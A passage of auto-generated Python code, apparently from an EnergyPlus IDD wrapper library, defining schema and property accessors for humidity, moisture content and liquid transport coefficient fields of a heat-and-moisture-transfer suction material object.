self["Moisture Content 20"] = value
@property
def relative_humidity_fraction_21(self):
"""field `Relative Humidity Fraction 21`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_21` or None if not set
"""
return self["Relative Humidity Fraction 21"]
@relative_humidity_fraction_21.setter
def relative_humidity_fraction_21(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 21`"""
self["Relative Humidity Fraction 21"] = value
@property
def moisture_content_21(self):
"""field `Moisture Content 21`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_21` or None if not set
"""
return self["Moisture Content 21"]
@moisture_content_21.setter
def moisture_content_21(self, value=None):
"""Corresponds to IDD field `Moisture Content 21`"""
self["Moisture Content 21"] = value
@property
def relative_humidity_fraction_22(self):
"""field `Relative Humidity Fraction 22`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_22` or None if not set
"""
return self["Relative Humidity Fraction 22"]
@relative_humidity_fraction_22.setter
def relative_humidity_fraction_22(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 22`"""
self["Relative Humidity Fraction 22"] = value
@property
def moisture_content_22(self):
"""field `Moisture Content 22`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_22` or None if not set
"""
return self["Moisture Content 22"]
@moisture_content_22.setter
def moisture_content_22(self, value=None):
"""Corresponds to IDD field `Moisture Content 22`"""
self["Moisture Content 22"] = value
@property
def relative_humidity_fraction_23(self):
"""field `Relative Humidity Fraction 23`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_23` or None if not set
"""
return self["Relative Humidity Fraction 23"]
@relative_humidity_fraction_23.setter
def relative_humidity_fraction_23(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 23`"""
self["Relative Humidity Fraction 23"] = value
@property
def moisture_content_23(self):
"""field `Moisture Content 23`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_23` or None if not set
"""
return self["Moisture Content 23"]
@moisture_content_23.setter
def moisture_content_23(self, value=None):
"""Corresponds to IDD field `Moisture Content 23`"""
self["Moisture Content 23"] = value
@property
def relative_humidity_fraction_24(self):
"""field `Relative Humidity Fraction 24`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_24` or None if not set
"""
return self["Relative Humidity Fraction 24"]
@relative_humidity_fraction_24.setter
def relative_humidity_fraction_24(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 24`"""
self["Relative Humidity Fraction 24"] = value
@property
def moisture_content_24(self):
"""field `Moisture Content 24`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_24` or None if not set
"""
return self["Moisture Content 24"]
@moisture_content_24.setter
def moisture_content_24(self, value=None):
"""Corresponds to IDD field `Moisture Content 24`"""
self["Moisture Content 24"] = value
@property
def relative_humidity_fraction_25(self):
"""field `Relative Humidity Fraction 25`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_25` or None if not set
"""
return self["Relative Humidity Fraction 25"]
@relative_humidity_fraction_25.setter
def relative_humidity_fraction_25(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 25`"""
self["Relative Humidity Fraction 25"] = value
@property
def moisture_content_25(self):
"""field `Moisture Content 25`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_25` or None if not set
"""
return self["Moisture Content 25"]
@moisture_content_25.setter
def moisture_content_25(self, value=None):
"""Corresponds to IDD field `Moisture Content 25`"""
self["Moisture Content 25"] = value
class MaterialPropertyHeatAndMoistureTransferSuction(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:Suction`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Relationship between liquid suction transport coefficient and moisture content
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'material name',
{'name': u'Material Name',
'pyname': u'material_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'number of suction points',
{'name': u'Number of Suction points',
'pyname': u'number_of_suction_points',
'maximum': 25,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'moisture content 1',
{'name': u'Moisture Content 1',
'pyname': u'moisture_content_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 1',
{'name': u'Liquid Transport Coefficient 1',
'pyname': u'liquid_transport_coefficient_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 2',
{'name': u'Moisture Content 2',
'pyname': u'moisture_content_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 2',
{'name': u'Liquid Transport Coefficient 2',
'pyname': u'liquid_transport_coefficient_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 3',
{'name': u'Moisture Content 3',
'pyname': u'moisture_content_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 3',
{'name': u'Liquid Transport Coefficient 3',
'pyname': u'liquid_transport_coefficient_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 4',
{'name': u'Moisture Content 4',
'pyname': u'moisture_content_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 4',
{'name': u'Liquid Transport Coefficient 4',
'pyname': u'liquid_transport_coefficient_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 5',
{'name': u'Moisture Content 5',
'pyname': u'moisture_content_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 5',
{'name': u'Liquid Transport Coefficient 5',
'pyname': u'liquid_transport_coefficient_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 6',
{'name': u'Moisture Content 6',
'pyname': u'moisture_content_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 6',
{'name': u'Liquid Transport Coefficient 6',
'pyname': u'liquid_transport_coefficient_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 7',
{'name': u'Moisture Content 7',
'pyname': u'moisture_content_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 7',
{'name': u'Liquid Transport Coefficient 7',
'pyname': u'liquid_transport_coefficient_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 8',
{'name': u'Moisture Content 8',
'pyname': u'moisture_content_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 8',
{'name': u'Liquid Transport Coefficient 8',
'pyname': u'liquid_transport_coefficient_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 9',
{'name': u'Moisture Content 9',
'pyname': u'moisture_content_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 9',
{'name': u'Liquid Transport Coefficient 9',
'pyname': u'liquid_transport_coefficient_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 10',
{'name': u'Moisture Content 10',
'pyname': u'moisture_content_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 10',
{'name': u'Liquid Transport Coefficient 10',
'pyname': u'liquid_transport_coefficient_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 11',
{'name': u'Moisture Content 11',
'pyname': u'moisture_content_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 11',
{'name': u'Liquid Transport Coefficient 11',
'pyname': u'liquid_transport_coefficient_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 12',
{'name': u'Moisture Content 12',
'pyname': u'moisture_content_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 12',
{'name': u'Liquid Transport Coefficient 12',
'pyname': u'liquid_transport_coefficient_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 13',
{'name': u'Moisture Content 13',
'pyname': u'moisture_content_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 13',
{'name': u'Liquid Transport Coefficient 13',
'pyname': u'liquid_transport_coefficient_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 14',
{'name': u'Moisture Content 14',
'pyname': u'moisture_content_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 14',
{'name': u'Liquid Transport Coefficient 14',
'pyname': u'liquid_transport_coefficient_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 15',
{'name': u'Moisture Content 15',
'pyname': u'moisture_content_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 15',
{'name': u'Liquid Transport Coefficient 15',
'pyname': u'liquid_transport_coefficient_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 16',
{'name': u'Moisture Content 16',
'pyname': u'moisture_content_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 16',
{'name': u'Liquid Transport Coefficient 16',
'pyname': u'liquid_transport_coefficient_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 17',
{'name': u'Moisture Content 17',
'pyname': u'moisture_content_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 17',
{'name': u'Liquid Transport Coefficient 17',
'pyname': u'liquid_transport_coefficient_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 18',
{'name': u'Moisture Content 18',
'pyname': u'moisture_content_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 18',
{'name': u'Liquid Transport Coefficient 18',
'pyname': u'liquid_transport_coefficient_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 19',
{'name': u'Moisture Content 19',
'pyname': u'moisture_content_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 19',
{'name': u'Liquid Transport Coefficient 19',
'pyname': u'liquid_transport_coefficient_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 20',
{'name': u'Moisture Content 20',
'pyname': u'moisture_content_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 20',
{'name': u'Liquid Transport Coefficient 20',
'pyname': u'liquid_transport_coefficient_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 21',
{'name': u'Moisture Content 21',
'pyname': u'moisture_content_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 21',
{'name': u'Liquid Transport Coefficient 21',
'pyname': u'liquid_transport_coefficient_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 22',
{'name': u'Moisture Content 22',
'pyname': u'moisture_content_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 22',
{'name': u'Liquid Transport Coefficient 22',
'pyname': u'liquid_transport_coefficient_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 23',
{'name': u'Moisture Content 23',
'pyname': u'moisture_content_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 23',
{'name': u'Liquid Transport Coefficient 23',
'pyname': u'liquid_transport_coefficient_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 24',
{'name': u'Moisture Content 24',
'pyname': u'moisture_content_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 24',
{'name': u'Liquid Transport Coefficient 24',
'pyname': u'liquid_transport_coefficient_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 25',
{'name': u'Moisture Content 25',
'pyname': u'moisture_content_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 25',
{'name': u'Liquid Transport Coefficient 25',
'pyname': u'liquid_transport_coefficient_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:HeatAndMoistureTransfer:Suction',
'pyname': u'MaterialPropertyHeatAndMoistureTransferSuction',
'required-object': False,
'unique-object': False}
@property
def material_name(self):
"""field `Material Name`
| Material Name that the moisture properties will be added to.
Args:
value (str): value for IDD Field `Material Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `material_name` or None if not set
"""
return self["Material Name"]
@material_name.setter
def material_name(self, value=None):
"""Corresponds to IDD field `Material Name`"""
self["Material Name"] = value
@property
def number_of_suction_points(self):
"""field `Number of Suction points`
| Number of Suction Liquid Transport Coefficient coordinates
| value >= 1
| value <= 25
Args:
value (int): value for IDD Field `Number of Suction points`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `number_of_suction_points` or None if not set
"""
return self["Number of Suction points"]
@number_of_suction_points.setter
def number_of_suction_points(self, value=None):
"""Corresponds to IDD field `Number of Suction points`"""
self["Number of Suction points"] = value
@property
def moisture_content_1(self):
"""field `Moisture Content 1`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_1` or None if not set
"""
return self["Moisture Content 1"]
@moisture_content_1.setter
def moisture_content_1(self, value=None):
"""Corresponds to IDD field `Moisture Content 1`"""
self["Moisture Content 1"] = value
@property
def liquid_transport_coefficient_1(self):
"""field `Liquid Transport Coefficient 1`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_1` or None if not set
"""
return self["Liquid Transport Coefficient 1"]
@liquid_transport_coefficient_1.setter
def liquid_transport_coefficient_1(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 1`"""
self["Liquid Transport Coefficient 1"] = value
@property
def moisture_content_2(self):
"""field `Moisture Content 2`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_2` or None if not set
"""
return self["Moisture Content 2"]
@moisture_content_2.setter
def moisture_content_2(self, value=None):
"""Corresponds to IDD field `Moisture Content 2`"""
self["Moisture Content 2"] = value
@property
def liquid_transport_coefficient_2(self):
"""field `Liquid Transport Coefficient 2`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_2` or None if not set
"""
return self["Liquid Transport Coefficient 2"]
@liquid_transport_coefficient_2.setter
def liquid_transport_coefficient_2(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 2`"""
self["Liquid Transport Coefficient 2"] = value
@property
def moisture_content_3(self):
"""field `Moisture Content 3`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_3` or None if not set
"""
return self["Moisture Content 3"]
@moisture_content_3.setter
def moisture_content_3(self, value=None):
"""Corresponds to IDD field `Moisture Content 3`"""
self["Moisture Content 3"] = value
@property
def liquid_transport_coefficient_3(self):
"""field `Liquid Transport Coefficient 3`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_3` or None if not set
"""
return self["Liquid Transport Coefficient 3"]
@liquid_transport_coefficient_3.setter
def liquid_transport_coefficient_3(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 3`"""
self["Liquid Transport Coefficient 3"] = value
@property
def moisture_content_4(self):
"""field `Moisture Content 4`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_4` or None if not set
"""
return self["Moisture Content 4"]
@moisture_content_4.setter
def moisture_content_4(self, value=None):
"""Corresponds to IDD field `Moisture Content 4`"""
self["Moisture Content 4"] = value
@property
def liquid_transport_coefficient_4(self):
"""field `Liquid Transport Coefficient 4`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_4` or None if not set
"""
return self["Liquid Transport Coefficient 4"]
@liquid_transport_coefficient_4.setter
def liquid_transport_coefficient_4(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 4`"""
self["Liquid Transport Coefficient 4"] = value
@property
def moisture_content_5(self):
"""field `Moisture Content 5`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_5` or None if not set
"""
return self["Moisture Content 5"]
@moisture_content_5.setter
def moisture_content_5(self, value=None):
"""Corresponds to IDD field `Moisture Content 5`"""
self["Moisture Content 5"] = value
@property
def liquid_transport_coefficient_5(self):
"""field `Liquid Transport Coefficient 5`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_5` or None if not set
"""
return self["Liquid Transport Coefficient 5"]
@liquid_transport_coefficient_5.setter
def liquid_transport_coefficient_5(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 5`"""
self["Liquid Transport Coefficient 5"] = value
@property
def moisture_content_6(self):
"""field `Moisture Content 6`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_6` or None if not set
"""
return self["Moisture Content 6"]
@moisture_content_6.setter
def moisture_content_6(self, value=None):
"""Corresponds to IDD field `Moisture Content 6`"""
self["Moisture Content 6"] = value
@property
def liquid_transport_coefficient_6(self):
"""field `Liquid Transport Coefficient 6`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_6` or None if not set
"""
return self["Liquid Transport Coefficient 6"]
@liquid_transport_coefficient_6.setter
def liquid_transport_coefficient_6(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 6`"""
self["Liquid Transport Coefficient 6"] = value
@property
def moisture_content_7(self):
"""field `Moisture Content 7`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_7` or None if not set
"""
return self["Moisture Content 7"]
@moisture_content_7.setter
def moisture_content_7(self, value=None):
"""Corresponds to IDD field `Moisture Content 7`"""
self["Moisture Content 7"] = value
@property
def liquid_transport_coefficient_7(self):
"""field `Liquid Transport Coefficient 7`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_7` or None if not set
"""
return self["Liquid Transport Coefficient 7"]
@liquid_transport_coefficient_7.setter
def liquid_transport_coefficient_7(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 7`"""
self["Liquid Transport Coefficient 7"] = value
@property
def moisture_content_8(self):
"""field `Moisture Content 8`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_8` or None if not set
"""
return self["Moisture Content 8"]
@moisture_content_8.setter
def moisture_content_8(self, value=None):
"""Corresponds to IDD field `Moisture Content 8`"""
self["Moisture Content 8"] = value
@property
def liquid_transport_coefficient_8(self):
"""field `Liquid Transport Coefficient 8`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_8` or None if not set
"""
return self["Liquid Transport Coefficient 8"]
@liquid_transport_coefficient_8.setter
def liquid_transport_coefficient_8(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 8`"""
self["Liquid Transport Coefficient 8"] = value
@property
def moisture_content_9(self):
"""field `Moisture Content 9`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_9` or None if not set
"""
return self["Moisture Content 9"]
@moisture_content_9.setter
def moisture_content_9(self, value=None):
"""Corresponds to IDD field `Moisture Content 9`"""
self["Moisture Content 9"] = value
@property
def liquid_transport_coefficient_9(self):
"""field `Liquid Transport Coefficient 9`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_9` or None if not set
"""
return self["Liquid Transport Coefficient 9"]
@liquid_transport_coefficient_9.setter
def liquid_transport_coefficient_9(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 9`"""
self["Liquid Transport Coefficient 9"] = value
@property
def moisture_content_10(self):
"""field `Moisture Content 10`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_10` or None if not set
"""
return self["Moisture Content 10"]
@moisture_content_10.setter
def moisture_content_10(self, value=None):
"""Corresponds to IDD field `Moisture Content 10`"""
self["Moisture Content 10"] = value
@property
def liquid_transport_coefficient_10(self):
"""field `Liquid Transport Coefficient 10`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_10` or None if not set
"""
return self["Liquid Transport Coefficient 10"]
@liquid_transport_coefficient_10.setter
def liquid_transport_coefficient_10(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 10`"""
self["Liquid Transport Coefficient 10"] = value
@property
def moisture_content_11(self):
"""field `Moisture Content 11`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_11` or None if not set
"""
return self["Moisture Content 11"]
@moisture_content_11.setter
def moisture_content_11(self, value=None):
"""Corresponds to IDD field `Moisture Content 11`"""
self["Moisture Content 11"] = value
@property
def liquid_transport_coefficient_11(self):
"""field `Liquid Transport Coefficient 11`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_11` or None if not set
"""
return self["Liquid Transport Coefficient 11"]
@liquid_transport_coefficient_11.setter
def liquid_transport_coefficient_11(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 11`"""
self["Liquid Transport Coefficient 11"] = value
@property
def moisture_content_12(self):
"""field `Moisture Content 12`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_12` or None if not set
"""
return self["Moisture Content 12"]
@moisture_content_12.setter
def moisture_content_12(self, value=None):
"""Corresponds to IDD field `Moisture Content 12`"""
self["Moisture Content 12"] = value
@property
def liquid_transport_coefficient_12(self):
"""field `Liquid Transport Coefficient 12`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_12` or None if not set
"""
return self["Liquid Transport Coefficient 12"]
@liquid_transport_coefficient_12.setter
def liquid_transport_coefficient_12(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 12`"""
self["Liquid Transport Coefficient 12"] = value
@property
def moisture_content_13(self):
"""field `Moisture Content 13`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_13` or None if not set
"""
return self["Moisture Content 13"]
@moisture_content_13.setter
def moisture_content_13(self, value=None):
"""Corresponds to IDD field `Moisture Content 13`"""
self["Moisture Content 13"] = value
@property
def liquid_transport_coefficient_13(self):
"""field `Liquid Transport Coefficient 13`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_13` or None if not set
"""
return self["Liquid Transport Coefficient 13"]
@liquid_transport_coefficient_13.setter
def liquid_transport_coefficient_13(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 13`"""
self["Liquid Transport Coefficient 13"] = value
@property
def moisture_content_14(self):
"""field `Moisture Content 14`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_14` or None if not set
"""
return self["Moisture Content 14"]
@moisture_content_14.setter
def moisture_content_14(self, value=None):
"""Corresponds to IDD field `Moisture Content 14`"""
self["Moisture Content 14"] = value
@property
def liquid_transport_coefficient_14(self):
"""field `Liquid Transport Coefficient 14`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_14` or None if not set
"""
return self["Liquid Transport Coefficient 14"]
